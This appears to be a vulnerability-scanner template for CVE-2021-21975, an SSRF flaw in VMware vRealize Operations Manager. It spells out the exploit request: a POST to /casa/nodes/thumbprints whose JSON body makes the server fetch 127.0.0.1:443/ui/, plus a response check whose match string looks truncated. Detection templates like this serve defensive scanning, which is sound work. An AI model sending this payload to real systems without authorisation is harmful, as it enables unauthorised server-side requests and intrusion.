product: Vmware-vRealize
vName: Vmware-vRealize thumbprints SSRF
type: 服务端请求伪造
vID:
  - CVE-2021-21975
level: 3
vDesc: ''
version: ''
note: ''
search: { }
protocol: http
link: https://www.vmware.com/security/advisories/VMSA-2021-0004.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: true
      path: /casa/nodes/thumbprints
      header:
        Content-Type: application/json
      data: '["127.0.0.1:443/ui/"]'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - ytes("vRealize Operations Manager
            logic: and